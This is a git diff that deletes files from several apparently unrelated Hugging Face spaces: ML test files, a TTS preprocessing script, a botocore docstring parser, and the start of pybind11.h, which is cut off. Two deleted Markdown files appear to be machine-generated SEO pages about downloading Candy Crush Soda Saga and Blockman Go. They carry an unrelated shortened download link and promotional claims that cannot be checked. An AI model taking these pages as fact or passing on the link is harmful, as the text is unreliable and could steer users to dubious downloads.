- err_msg = "computed proposal boxes = {}, expected {}".format( - proposal.proposal_boxes.tensor, expected_proposal_box - ) - self.assertTrue( - torch.allclose(proposal.proposal_boxes.tensor[:4], expected_proposal_box, atol=1e-5), - err_msg, - ) - - err_msg = "computed objectness logits = {}, expected {}".format( - proposal.objectness_logits, expected_objectness_logit - ) - self.assertTrue( - torch.allclose(proposal.objectness_logits[:4], expected_objectness_logit, atol=1e-5), - err_msg, - ) - - def test_find_rpn_proposals_inf(self): - N, Hi, Wi, A = 3, 3, 3, 3 - proposals = [torch.rand(N, Hi * Wi * A, 4)] - pred_logits = [torch.rand(N, Hi * Wi * A)] - pred_logits[0][1][3:5].fill_(float("inf")) - find_top_rpn_proposals(proposals, pred_logits, [(10, 10)], 0.5, 1000, 1000, 0, False) - - def test_find_rpn_proposals_tracing(self): - N, Hi, Wi, A = 3, 50, 50, 9 - proposal = torch.rand(N, Hi * Wi * A, 4) - pred_logit = torch.rand(N, Hi * Wi * A) - - def func(proposal, logit, image_size): - r = find_top_rpn_proposals( - [proposal], [logit], [image_size], 0.7, 1000, 1000, 0, False - )[0] - size = r.image_size - if not isinstance(size, torch.Tensor): - size = torch.tensor(size) - return (size, r.proposal_boxes.tensor, r.objectness_logits) - - other_inputs = [] - # test that it generalizes to other shapes - for Hi, Wi, shp in [(30, 30, 60), (10, 10, 800)]: - other_inputs.append( - ( - torch.rand(N, Hi * Wi * A, 4), - torch.rand(N, Hi * Wi * A), - torch.tensor([shp, shp]), - ) - ) - torch.jit.trace( - func, (proposal, pred_logit, torch.tensor([100, 100])), check_inputs=other_inputs - ) - - def test_append_gt_to_proposal(self): - proposals = Instances( - (10, 10), - **{ - "proposal_boxes": Boxes(torch.empty((0, 4))), - "objectness_logits": torch.tensor([]), - "custom_attribute": torch.tensor([]), - } - ) - gt_boxes = Boxes(torch.tensor([[0, 0, 1, 1]])) - - self.assertRaises(AssertionError, add_ground_truth_to_proposals, [gt_boxes], [proposals]) - - gt_instances = 
Instances((10, 10)) - gt_instances.gt_boxes = gt_boxes - - self.assertRaises( - AssertionError, add_ground_truth_to_proposals, [gt_instances], [proposals] - ) - - gt_instances.custom_attribute = torch.tensor([1]) - gt_instances.custom_attribute2 = torch.tensor([1]) - new_proposals = add_ground_truth_to_proposals([gt_instances], [proposals])[0] - - self.assertEqual(new_proposals.custom_attribute[0], 1) - # new proposals should only include the attributes in proposals - self.assertRaises(AttributeError, lambda: new_proposals.custom_attribute2) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/AzumaSeren100/XuanShen-Bert-VITS2/bert_gen.py b/spaces/AzumaSeren100/XuanShen-Bert-VITS2/bert_gen.py deleted file mode 100644 index 52220d81da097772277eb3bd49f0d3db65884523..0000000000000000000000000000000000000000 --- a/spaces/AzumaSeren100/XuanShen-Bert-VITS2/bert_gen.py +++ /dev/null @@ -1,54 +0,0 @@ -import torch -from torch.utils.data import DataLoader -from multiprocessing import Pool -import commons -import utils -from data_utils import TextAudioSpeakerLoader, TextAudioSpeakerCollate -from tqdm import tqdm -import warnings - -from text import cleaned_text_to_sequence, get_bert - -config_path = 'configs/config.json' -hps = utils.get_hparams_from_file(config_path) - -def process_line(line): - _id, spk, language_str, text, phones, tone, word2ph = line.strip().split("|") - phone = phones.split(" ") - tone = [int(i) for i in tone.split(" ")] - word2ph = [int(i) for i in word2ph.split(" ")] - w2pho = [i for i in word2ph] - word2ph = [i for i in word2ph] - phone, tone, language = cleaned_text_to_sequence(phone, tone, language_str) - - if hps.data.add_blank: - phone = commons.intersperse(phone, 0) - tone = commons.intersperse(tone, 0) - language = commons.intersperse(language, 0) - for i in range(len(word2ph)): - word2ph[i] = word2ph[i] * 2 - word2ph[0] += 1 - wav_path = f'{_id}' - - bert_path = wav_path.replace(".wav", ".bert.pt") - - try: - bert = 
torch.load(bert_path) - assert bert.shape[-1] == len(phone) - except: - bert = get_bert(text, word2ph, language_str) - assert bert.shape[-1] == len(phone) - torch.save(bert, bert_path) - - -if __name__ == '__main__': - lines = [] - with open(hps.data.training_files, encoding='utf-8' ) as f: - lines.extend(f.readlines()) - - with open(hps.data.validation_files, encoding='utf-8' ) as f: - lines.extend(f.readlines()) - - with Pool(processes=6) as pool: #P40 24GB suitable config,if coom,please decrease the processess number. - for _ in tqdm(pool.imap_unordered(process_line, lines)): - pass diff --git a/spaces/Bajr/softly/README.md b/spaces/Bajr/softly/README.md deleted file mode 100644 index 05bc77ff2110f21e508f8010a3d40cee35a05ace..0000000000000000000000000000000000000000 --- a/spaces/Bajr/softly/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: Yummy Research -emoji: 🍦 -colorFrom: red -colorTo: blue -sdk: docker -pinned: false -duplicated_from: Bajr/soft ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Benson/text-generation/Examples/Caramelo Crush Soda Saga Juego Gratis Para Pc.md b/spaces/Benson/text-generation/Examples/Caramelo Crush Soda Saga Juego Gratis Para Pc.md deleted file mode 100644 index 2a9260035906288adf75df79e0c0bf1c02241d68..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Caramelo Crush Soda Saga Juego Gratis Para Pc.md +++ /dev/null @@ -1,103 +0,0 @@ - -

Candy Crush Soda Saga: How to Download and Play This Fun Puzzle Game on Your PC

-

If you enjoy matching candies and solving puzzles, you may have heard of Candy Crush Soda Saga, one of the most popular games in the world. This game is a sequel to the legendary Candy Crush Saga, and it offers more fun and challenges with new candies, modes, and features. In this article, we will show you how to download and play this game on your PC for free using the Epic Games Store. We will also tell you why playing puzzle games on your PC is good for your brain and your mood, and give you some tips and tricks to get the most out of your gaming experience.

-

What Is Candy Crush Soda Saga?

-

Candy Crush Soda Saga is a match-3 puzzle game developed by King, a leading casual games company. The game was released in 2014 as a spin-off of Candy Crush Saga, which has more than one billion downloads worldwide. The game follows the adventures of Kimmy, who is searching for her sister Tiffi in a world full of candy. Along the way, she meets new characters and faces new challenges.

-




-

The game has more than 10,000 levels, each with a different objective and layout. You have to match three or more candies of the same color to clear them from the board and create special candies with extra effects. You also have to deal with various obstacles, such as ice, honeycomb, jam, chocolate, and soda bottles. The game has different modes, such as Soda, Frosting, Honeycomb, Jam, Bubblegum, and more. Each mode has its own rules and strategies.

-

The game also has many features that make it more fun and engaging. You can play with your friends online and compete for high scores. You can also join teams and cooperate with other players in events and challenges. You can earn rewards and boosters that help you through difficult levels. The game also gets monthly updates that bring new content and surprises.

-

Why Play Candy Crush Soda Saga on Your PC?

- -
    -
  • You can enjoy better graphics and sound quality on a bigger screen.
  • You can use the mouse and keyboard to control the game more easily.
  • You can save battery life and data usage on your phone or tablet.
  • You can avoid distractions from notifications and calls while you play.
-

One of the best ways to play Candy Crush Soda Saga on your PC is to use the Epic Games Store, a digital distribution platform that lets you download games to your PC through the Epic Games Launcher. The Epic Games Store has many advantages, such as:

-
    -
  • You can access hundreds of games across various genres and categories.
  • You can get free games every week.
  • You can enjoy exclusive deals and discounts.
  • You can support developers by giving them a larger share of the revenue.
  • You can connect with your friends and other players through chat and social features.
-

How to Download and Play Candy Crush Soda Saga on Your PC

-

Downloading and playing Candy Crush Soda Saga on your PC is very easy. Just follow these steps:

-
    -
  1. Install the Epic Games Launcher. You can download it from https://epicgames.com/en-US/download and run the installer. You will need to create an account or sign in with an existing one.
  2. Search for Candy Crush Soda Saga in the Epic Games Store. You can find it in the Free Games section or use the search bar.
  3. Click the Get button and confirm your order. The game will be added to your library.
  4. Go to your library and click the Install button next to the game. Choose a location for the game files and wait for the download and installation to complete.
  5. Launch the game from your library or from the desktop shortcut. You can also adjust the game's settings and preferences from the launcher.

| System Requirements | Minimum | Recommended |
| --- | --- | --- |
| Operating System | Windows 7 or higher | Windows 10 |
| Processor | Intel Core i3 or equivalent | Intel Core i5 or equivalent |
| Memory | 4 GB RAM | 8 GB RAM |
| Graphics | Intel HD Graphics 4000 or higher | NVIDIA GeForce GTX 660 or higher |
| Storage | 500 MB available space | 1 GB available space |
| Internet Connection | Broadband internet connection | Broadband internet connection |

Tips and tricks to enjoy Candy Crush Soda Saga even more

Candy Crush Soda Saga is a fun and addictive game, but it can also be challenging and frustrating at times. Here are some tips and tricks to help you enjoy the game more:

- Plan your moves. Look for matches that can create special candies, such as striped, wrapped, fish, or coloring candies. These can help you clear more candies and obstacles in a single move.
- Use boosters wisely. Boosters are items that give you an edge in the game, such as extra moves, lollipop hammers, free switches, and more. You can earn them by completing levels, events, or challenges, or buy them with real money. However, don't rely on them too much, as they are limited and can run out quickly.
- Play with friends. Playing with friends makes the game more fun and social. You can invite your friends to join your team, send and receive lives, chat with them, and compete for high scores. You can also ask them for help when you're stuck on a level.
- Have fun. Don't let the game stress or frustrate you. Remember that it's just a game, and the main purpose is to have fun. Enjoy the colorful graphics, catchy music, and cute characters. Don't be afraid to experiment with different strategies and see what works for you.

Conclusion

Candy Crush Soda Saga is a great game to play on your PC, especially if you like puzzle and candy games. You can download it for free from the Epic Games Store and enjoy its features and benefits. You can also follow our tips and tricks to get the most out of your gaming experience. What are you waiting for? Download Candy Crush Soda Saga today and join Kimmy on her sweet adventure!

Frequently asked questions

Here are some of the most frequently asked questions about Candy Crush Soda Saga:

Q: How many levels are there in Candy Crush Soda Saga?

A: There are more than 10,000 levels in Candy Crush Soda Saga as of June 2023, and more are added every month.

Q: How can I sync my progress across devices?

A: You can sync your progress across devices by connecting your game to Facebook or King.com. This also lets you access your saved boosters and lives.

Q: How do I get more lives?

A: You have five lives in Candy Crush Soda Saga, and you lose one each time you fail a level. You can get more lives by waiting for them to refill (one life every 30 minutes), asking your friends to send you some, buying them with gold bars, or playing the daily quests.

Q: What are gold bars and how do I get them?

A: Gold bars are the premium currency in Candy Crush Soda Saga. You can use them to buy boosters, lives, moves, and other items. You can get gold bars by completing levels, events, or challenges, or by buying them with real money.

Q: What are the different types of special candies and how do I make them?

A:
- Striped candy: Match four candies of the same color in a row or column. This creates a striped candy that clears an entire row or column when matched.
- Wrapped candy: Match five candies of the same color in an L or T shape. This creates a wrapped candy that explodes twice when matched, clearing a 3x3 area each time.
- Fish candy: Match four candies of the same color in a square. This creates a fish candy that swims to a random candy or obstacle and clears it when matched.
- Coloring candy: Match six or more candies of the same color. This creates a coloring candy that, when matched, changes all candies of its color.
- Color bomb: Match five candies of the same color in a row or column. This creates a color bomb that clears all candies of the same color as the candy it is swapped with.
- Swedish fish: A special candy that can only be obtained by using boosters or by playing certain levels. It acts like a fish candy, but can target the specific candies or obstacles needed to complete the level.

    \ No newline at end of file diff --git a/spaces/Benson/text-generation/Examples/Cmo Descargar Blockman Ir En El PC Gratis.md b/spaces/Benson/text-generation/Examples/Cmo Descargar Blockman Ir En El PC Gratis.md deleted file mode 100644 index e0d6ebe5e01647e8b24830f021cbd475e48101f5..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Cmo Descargar Blockman Ir En El PC Gratis.md +++ /dev/null @@ -1,57 +0,0 @@ - -

How to download Blockman Go on PC for free

Blockman Go is a popular game that combines elements of sandbox, adventure, action, and social games. You can play various block-style minigames, chat and make friends with other players, and customize your avatar and home with different decorations. But did you know that you can also play Blockman Go on your PC for free? In this article, we will show you how to download and install Blockman Go on your PC with BlueStacks, a powerful Android emulator that lets you run Android apps and games on your computer or laptop.

how to download Blockman Go on PC for free


    Download ►►► https://bltlly.com/2v6INR



What is Blockman Go?

Blockman Go is a free app developed by Blockman GO Studio. It is a sandbox game that lets you play, create, and share fun experiences with your friends. You can choose from a large catalog of minigames, which are continuously updated to keep things fresh and fun. Some of the popular minigames are Bed Wars, Egg War, Sky Block, Free City RP, Anime Fighting Simulator, and more. You can join any game with one click and earn rewards for playing.

Blockman Go is also a social platform where you can chat and make friends with other players. You can join or create parties, send messages, voice chat, and interact with others in various ways. You can also join the growing developer community and share your creations with the world.

Blockman Go is also a creative tool that lets you customize your avatar and home with different accessories, costumes, and decorations. You can express your unique style and personality with hundreds of available options. You can also use the Blockman Editor to create your own sandbox experiences and minigames.

Why play Blockman Go on PC?

While Blockman Go is designed for mobile devices, you can also play it on your PC for free with BlueStacks. There are many advantages to playing Blockman Go on PC, such as:

- You can use the keyboard and mouse for more precise controls, which gives you an edge in competitive minigames.
- You can access thousands of apps and productivity tools with BlueStacks, which help you work more efficiently and conveniently on your PC.

How to download and install Blockman Go on PC with BlueStacks

To play Blockman Go on PC for free, you first need to download and install BlueStacks on your PC. BlueStacks is an Android emulator that lets you run Android apps and games on your computer or laptop. Here are the steps to download and install Blockman Go on PC with BlueStacks:

1. Download and install BlueStacks on your PC from this link.
2. Complete the Google sign-in to access the Play Store, or do it later.
3. Search for Blockman Go in the app center or the search bar in the top-right corner.
4. Click to install Blockman Go from the search results.
5. Click the Blockman Go icon on the home screen to start playing.
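Since emulator and game installers are often redistributed by third-party download sites, it is worth comparing a downloaded installer against the checksum the vendor publishes before running it. This sketch is not part of the original guide; the file name and expected hash below are placeholders, not real values.

```python
import hashlib


def sha256_of(path, chunk_size=1 << 20):
    """Return the SHA-256 hex digest of a file, read in 1 MB chunks
    so large installers don't have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


# Placeholder values -- substitute the real installer path and the
# checksum published by the vendor before relying on this check.
installer = "BlueStacksInstaller.exe"
expected = "0" * 64

# if sha256_of(installer) != expected:
#     raise SystemExit("Checksum mismatch -- do not run this installer.")
```

If the digests differ, the download was corrupted or tampered with and should be discarded.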

Conclusion

Blockman Go is a fun and versatile game that offers plenty of entertainment and creativity. You can play various minigames, chat and make friends, and customize your avatar and home. You can also play Blockman Go on your PC for free with BlueStacks, an Android emulator that lets you run Android apps and games on your computer or laptop. By playing Blockman Go on PC, you can enjoy a bigger screen, better graphics, keyboard and mouse controls, and access to thousands of apps and productivity tools. To download and install Blockman Go on PC with BlueStacks, you just need to follow a few simple steps. We hope this article has helped you learn how to download Blockman Go on PC for free.

Frequently asked questions

Here are some frequently asked questions about Blockman Go and BlueStacks:

| Question | Answer |
| --- | --- |
| Is Blockman Go free to play? | Yes, Blockman Go is a free app. |
| Is Blockman Go safe to play? | Yes, Blockman Go is safe to play. It has a 4.3 rating on the Google Play Store and a 4.6 rating on the App Store. It also has parental controls and anti-cheat systems to ensure a fair and safe gaming environment. |
| Is BlueStacks free to use? | Yes, BlueStacks is free to use. You can download it from this link. You can also upgrade to BlueStacks Premium for more features and benefits. |
| Is BlueStacks safe to use? | Yes, BlueStacks is safe to use. It is the most trusted and popular Android emulator in the world, with over 500 million users. It also has advanced security features and antivirus protection to ensure your safety and privacy. |
| How can I contact Blockman Go or BlueStacks support? | If you have any issues or questions about Blockman Go or BlueStacks, you can contact their support teams through their official websites or social media channels. You can also check their FAQs and forums for more information and solutions. |

    \ No newline at end of file diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/botocore/docs/bcdoc/docstringparser.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/botocore/docs/bcdoc/docstringparser.py deleted file mode 100644 index 16e74e7d20f0f100b0a0e615069f9b0b4e12449c..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/botocore/docs/bcdoc/docstringparser.py +++ /dev/null @@ -1,315 +0,0 @@ -# Copyright 2012-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"). You -# may not use this file except in compliance with the License. A copy of -# the License is located at -# -# http://aws.amazon.com/apache2.0/ -# -# or in the "license" file accompanying this file. This file is -# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF -# ANY KIND, either express or implied. See the License for the specific -# language governing permissions and limitations under the License. -from html.parser import HTMLParser -from itertools import zip_longest - -PRIORITY_PARENT_TAGS = ('code', 'a') -OMIT_NESTED_TAGS = ('span', 'i', 'code', 'a') -OMIT_SELF_TAGS = ('i', 'b') -HTML_BLOCK_DISPLAY_TAGS = ('p', 'note', 'ul', 'li') - - -class DocStringParser(HTMLParser): - """ - A simple HTML parser. Focused on converting the subset of HTML - that appears in the documentation strings of the JSON models into - simple ReST format. - """ - - def __init__(self, doc): - self.tree = None - self.doc = doc - super().__init__() - - def reset(self): - HTMLParser.reset(self) - self.tree = HTMLTree(self.doc) - - def feed(self, data): - super().feed(data) - self.tree.write() - self.tree = HTMLTree(self.doc) - - def close(self): - super().close() - # Write if there is anything remaining. 
- self.tree.write() - self.tree = HTMLTree(self.doc) - - def handle_starttag(self, tag, attrs): - self.tree.add_tag(tag, attrs=attrs) - - def handle_endtag(self, tag): - self.tree.add_tag(tag, is_start=False) - - def handle_data(self, data): - self.tree.add_data(data) - - -class HTMLTree: - """ - A tree which handles HTML nodes. Designed to work with a python HTML parser, - meaning that the current_node will be the most recently opened tag. When - a tag is closed, the current_node moves up to the parent node. - """ - - def __init__(self, doc): - self.doc = doc - self.head = StemNode() - self.current_node = self.head - self.unhandled_tags = [] - - def add_tag(self, tag, attrs=None, is_start=True): - if not self._doc_has_handler(tag, is_start): - self.unhandled_tags.append(tag) - return - - if is_start: - node = TagNode(tag, attrs) - self.current_node.add_child(node) - self.current_node = node - else: - self.current_node = self.current_node.parent - - def _doc_has_handler(self, tag, is_start): - if is_start: - handler_name = 'start_%s' % tag - else: - handler_name = 'end_%s' % tag - - return hasattr(self.doc.style, handler_name) - - def add_data(self, data): - self.current_node.add_child(DataNode(data)) - - def write(self): - self.head.write(self.doc) - - -class Node: - def __init__(self, parent=None): - self.parent = parent - - def write(self, doc): - raise NotImplementedError - - -class StemNode(Node): - def __init__(self, parent=None): - super().__init__(parent) - self.children = [] - - def add_child(self, child): - child.parent = self - self.children.append(child) - - def write(self, doc): - self.collapse_whitespace() - self._write_children(doc) - - def _write_children(self, doc): - for child, next_child in zip_longest(self.children, self.children[1:]): - if isinstance(child, TagNode) and next_child is not None: - child.write(doc, next_child) - else: - child.write(doc) - - def is_whitespace(self): - return all(child.is_whitespace() for child in self.children) - - 
def startswith_whitespace(self): - return self.children and self.children[0].startswith_whitespace() - - def endswith_whitespace(self): - return self.children and self.children[-1].endswith_whitespace() - - def lstrip(self): - while self.children and self.children[0].is_whitespace(): - self.children = self.children[1:] - if self.children: - self.children[0].lstrip() - - def rstrip(self): - while self.children and self.children[-1].is_whitespace(): - self.children = self.children[:-1] - if self.children: - self.children[-1].rstrip() - - def collapse_whitespace(self): - """Remove collapsible white-space from HTML. - - HTML in docstrings often contains extraneous white-space around tags, - for readability. Browsers would collapse this white-space before - rendering. If not removed before conversion to RST where white-space is - part of the syntax, for example for indentation, it can result in - incorrect output. - """ - self.lstrip() - self.rstrip() - for child in self.children: - child.collapse_whitespace() - - -class TagNode(StemNode): - """ - A generic Tag node. It will verify that handlers exist before writing. - """ - - def __init__(self, tag, attrs=None, parent=None): - super().__init__(parent) - self.attrs = attrs - self.tag = tag - - def _has_nested_tags(self): - # Returns True if any children are TagNodes and False otherwise. - return any(isinstance(child, TagNode) for child in self.children) - - def write(self, doc, next_child=None): - prioritize_nested_tags = ( - self.tag in OMIT_SELF_TAGS and self._has_nested_tags() - ) - prioritize_parent_tag = ( - isinstance(self.parent, TagNode) - and self.parent.tag in PRIORITY_PARENT_TAGS - and self.tag in OMIT_NESTED_TAGS - ) - if prioritize_nested_tags or prioritize_parent_tag: - self._write_children(doc) - return - - self._write_start(doc) - self._write_children(doc) - self._write_end(doc, next_child) - - def collapse_whitespace(self): - """Remove collapsible white-space. - - All tags collapse internal whitespace. 
Block-display HTML tags also - strip all leading and trailing whitespace. - - Approximately follows the specification used in browsers: - https://www.w3.org/TR/css-text-3/#white-space-rules - https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model/Whitespace - """ - if self.tag in HTML_BLOCK_DISPLAY_TAGS: - self.lstrip() - self.rstrip() - # Collapse whitespace in situations like `` foo`` into - # `` foo``. - for prev, cur in zip(self.children[:-1], self.children[1:]): - if ( - isinstance(prev, DataNode) - and prev.endswith_whitespace() - and cur.startswith_whitespace() - ): - cur.lstrip() - # Same logic, but for situations like ``bar ``: - for cur, nxt in zip(self.children[:-1], self.children[1:]): - if ( - isinstance(nxt, DataNode) - and cur.endswith_whitespace() - and nxt.startswith_whitespace() - ): - cur.rstrip() - # Recurse into children - for child in self.children: - child.collapse_whitespace() - - def _write_start(self, doc): - handler_name = 'start_%s' % self.tag - if hasattr(doc.style, handler_name): - getattr(doc.style, handler_name)(self.attrs) - - def _write_end(self, doc, next_child): - handler_name = 'end_%s' % self.tag - if hasattr(doc.style, handler_name): - if handler_name == 'end_a': - # We use lookahead to determine if a space is needed after a link node - getattr(doc.style, handler_name)(next_child) - else: - getattr(doc.style, handler_name)() - - -class DataNode(Node): - """ - A Node that contains only string data. - """ - - def __init__(self, data, parent=None): - super().__init__(parent) - if not isinstance(data, str): - raise ValueError("Expecting string type, %s given." 
% type(data)) - self._leading_whitespace = '' - self._trailing_whitespace = '' - self._stripped_data = '' - if data == '': - return - if data.isspace(): - self._trailing_whitespace = data - return - first_non_space = next( - idx for idx, ch in enumerate(data) if not ch.isspace() - ) - last_non_space = len(data) - next( - idx for idx, ch in enumerate(reversed(data)) if not ch.isspace() - ) - self._leading_whitespace = data[:first_non_space] - self._trailing_whitespace = data[last_non_space:] - self._stripped_data = data[first_non_space:last_non_space] - - @property - def data(self): - return ( - f'{self._leading_whitespace}{self._stripped_data}' - f'{self._trailing_whitespace}' - ) - - def is_whitespace(self): - return self._stripped_data == '' and ( - self._leading_whitespace != '' or self._trailing_whitespace != '' - ) - - def startswith_whitespace(self): - return self._leading_whitespace != '' or ( - self._stripped_data == '' and self._trailing_whitespace != '' - ) - - def endswith_whitespace(self): - return self._trailing_whitespace != '' or ( - self._stripped_data == '' and self._leading_whitespace != '' - ) - - def lstrip(self): - if self._leading_whitespace != '': - self._leading_whitespace = '' - elif self._stripped_data == '': - self.rstrip() - - def rstrip(self): - if self._trailing_whitespace != '': - self._trailing_whitespace = '' - elif self._stripped_data == '': - self.lstrip() - - def collapse_whitespace(self): - """Noop, ``DataNode.write`` always collapses whitespace""" - return - - def write(self, doc): - words = doc.translate_words(self._stripped_data.split()) - str_data = ( - f'{self._leading_whitespace}{" ".join(words)}' - f'{self._trailing_whitespace}' - ) - if str_data != '': - doc.handle_data(str_data) diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/themes.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/themes.py deleted file mode 100644 index 
bf6db104a2c4fd4f3dc699e85f2b262c3d31e9a0..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/themes.py +++ /dev/null @@ -1,5 +0,0 @@ -from .default_styles import DEFAULT_STYLES -from .theme import Theme - - -DEFAULT = Theme(DEFAULT_STYLES) diff --git a/spaces/Billyosoro/ESRGAN/tests/test_discriminator_arch.py b/spaces/Billyosoro/ESRGAN/tests/test_discriminator_arch.py deleted file mode 100644 index c56a40c7743630aa63b3e99bca8dc1a85949c4c5..0000000000000000000000000000000000000000 --- a/spaces/Billyosoro/ESRGAN/tests/test_discriminator_arch.py +++ /dev/null @@ -1,19 +0,0 @@ -import torch - -from realesrgan.archs.discriminator_arch import UNetDiscriminatorSN - - -def test_unetdiscriminatorsn(): - """Test arch: UNetDiscriminatorSN.""" - - # model init and forward (cpu) - net = UNetDiscriminatorSN(num_in_ch=3, num_feat=4, skip_connection=True) - img = torch.rand((1, 3, 32, 32), dtype=torch.float32) - output = net(img) - assert output.shape == (1, 1, 32, 32) - - # model init and forward (gpu) - if torch.cuda.is_available(): - net.cuda() - output = net(img.cuda()) - assert output.shape == (1, 1, 32, 32) diff --git a/spaces/CVPR/LIVE/pybind11/include/pybind11/pybind11.h b/spaces/CVPR/LIVE/pybind11/include/pybind11/pybind11.h deleted file mode 100644 index 3a7d7b88495afddabff7f9604c94e828eb780152..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/pybind11/include/pybind11/pybind11.h +++ /dev/null @@ -1,2235 +0,0 @@ -/* - pybind11/pybind11.h: Main header file of the C++11 python - binding generator library - - Copyright (c) 2016 Wenzel Jakob - - All rights reserved. Use of this source code is governed by a - BSD-style license that can be found in the LICENSE file. 
-*/ - -#pragma once - -#if defined(__INTEL_COMPILER) -# pragma warning push -# pragma warning disable 68 // integer conversion resulted in a change of sign -# pragma warning disable 186 // pointless comparison of unsigned integer with zero -# pragma warning disable 878 // incompatible exception specifications -# pragma warning disable 1334 // the "template" keyword used for syntactic disambiguation may only be used within a template -# pragma warning disable 1682 // implicit conversion of a 64-bit integral type to a smaller integral type (potential portability problem) -# pragma warning disable 1786 // function "strdup" was declared deprecated -# pragma warning disable 1875 // offsetof applied to non-POD (Plain Old Data) types is nonstandard -# pragma warning disable 2196 // warning #2196: routine is both "inline" and "noinline" -#elif defined(_MSC_VER) -# pragma warning(push) -# pragma warning(disable: 4100) // warning C4100: Unreferenced formal parameter -# pragma warning(disable: 4127) // warning C4127: Conditional expression is constant -# pragma warning(disable: 4512) // warning C4512: Assignment operator was implicitly defined as deleted -# pragma warning(disable: 4800) // warning C4800: 'int': forcing value to bool 'true' or 'false' (performance warning) -# pragma warning(disable: 4996) // warning C4996: The POSIX name for this item is deprecated. 
Instead, use the ISO C and C++ conformant name -# pragma warning(disable: 4702) // warning C4702: unreachable code -# pragma warning(disable: 4522) // warning C4522: multiple assignment operators specified -#elif defined(__GNUG__) && !defined(__clang__) -# pragma GCC diagnostic push -# pragma GCC diagnostic ignored "-Wunused-but-set-parameter" -# pragma GCC diagnostic ignored "-Wunused-but-set-variable" -# pragma GCC diagnostic ignored "-Wmissing-field-initializers" -# pragma GCC diagnostic ignored "-Wstrict-aliasing" -# pragma GCC diagnostic ignored "-Wattributes" -# if __GNUC__ >= 7 -# pragma GCC diagnostic ignored "-Wnoexcept-type" -# endif -#endif - -#include "attr.h" -#include "options.h" -#include "detail/class.h" -#include "detail/init.h" - -#if defined(__GNUG__) && !defined(__clang__) -# include -#endif - -PYBIND11_NAMESPACE_BEGIN(PYBIND11_NAMESPACE) - -/// Wraps an arbitrary C++ function/method/lambda function/.. into a callable Python object -class cpp_function : public function { -public: - cpp_function() { } - cpp_function(std::nullptr_t) { } - - /// Construct a cpp_function from a vanilla function pointer - template - cpp_function(Return (*f)(Args...), const Extra&... extra) { - initialize(f, f, extra...); - } - - /// Construct a cpp_function from a lambda function (possibly with internal state) - template ::value>> - cpp_function(Func &&f, const Extra&... extra) { - initialize(std::forward(f), - (detail::function_signature_t *) nullptr, extra...); - } - - /// Construct a cpp_function from a class method (non-const, no ref-qualifier) - template - cpp_function(Return (Class::*f)(Arg...), const Extra&... extra) { - initialize([f](Class *c, Arg... 
args) -> Return { return (c->*f)(std::forward(args)...); }, - (Return (*) (Class *, Arg...)) nullptr, extra...); - } - - /// Construct a cpp_function from a class method (non-const, lvalue ref-qualifier) - /// A copy of the overload for non-const functions without explicit ref-qualifier - /// but with an added `&`. - template - cpp_function(Return (Class::*f)(Arg...)&, const Extra&... extra) { - initialize([f](Class *c, Arg... args) -> Return { return (c->*f)(args...); }, - (Return (*) (Class *, Arg...)) nullptr, extra...); - } - - /// Construct a cpp_function from a class method (const, no ref-qualifier) - template - cpp_function(Return (Class::*f)(Arg...) const, const Extra&... extra) { - initialize([f](const Class *c, Arg... args) -> Return { return (c->*f)(std::forward(args)...); }, - (Return (*)(const Class *, Arg ...)) nullptr, extra...); - } - - /// Construct a cpp_function from a class method (const, lvalue ref-qualifier) - /// A copy of the overload for const functions without explicit ref-qualifier - /// but with an added `&`. - template - cpp_function(Return (Class::*f)(Arg...) const&, const Extra&... extra) { - initialize([f](const Class *c, Arg... args) -> Return { return (c->*f)(args...); }, - (Return (*)(const Class *, Arg ...)) nullptr, extra...); - } - - /// Return the function name - object name() const { return attr("__name__"); } - -protected: - /// Space optimization: don't inline this frequently instantiated fragment - PYBIND11_NOINLINE detail::function_record *make_function_record() { - return new detail::function_record(); - } - - /// Special internal constructor for functors, lambda functions, etc. - template - void initialize(Func &&f, Return (*)(Args...), const Extra&... extra) { - using namespace detail; - struct capture { remove_reference_t f; }; - - /* Store the function including any extra state it might have (e.g. 
a lambda capture object) */ - auto rec = make_function_record(); - - /* Store the capture object directly in the function record if there is enough space */ - if (sizeof(capture) <= sizeof(rec->data)) { - /* Without these pragmas, GCC warns that there might not be - enough space to use the placement new operator. However, the - 'if' statement above ensures that this is the case. */ -#if defined(__GNUG__) && !defined(__clang__) && __GNUC__ >= 6 -# pragma GCC diagnostic push -# pragma GCC diagnostic ignored "-Wplacement-new" -#endif - new ((capture *) &rec->data) capture { std::forward(f) }; -#if defined(__GNUG__) && !defined(__clang__) && __GNUC__ >= 6 -# pragma GCC diagnostic pop -#endif - if (!std::is_trivially_destructible::value) - rec->free_data = [](function_record *r) { ((capture *) &r->data)->~capture(); }; - } else { - rec->data[0] = new capture { std::forward(f) }; - rec->free_data = [](function_record *r) { delete ((capture *) r->data[0]); }; - } - - /* Type casters for the function arguments and return value */ - using cast_in = argument_loader; - using cast_out = make_caster< - conditional_t::value, void_type, Return> - >; - - static_assert(expected_num_args(sizeof...(Args), cast_in::has_args, cast_in::has_kwargs), - "The number of argument annotations does not match the number of function arguments"); - - /* Dispatch code which converts function arguments and performs the actual function call */ - rec->impl = [](function_call &call) -> handle { - cast_in args_converter; - - /* Try to cast the function arguments into the C++ domain */ - if (!args_converter.load_args(call)) - return PYBIND11_TRY_NEXT_OVERLOAD; - - /* Invoke call policy pre-call hook */ - process_attributes::precall(call); - - /* Get a pointer to the capture object */ - auto data = (sizeof(capture) <= 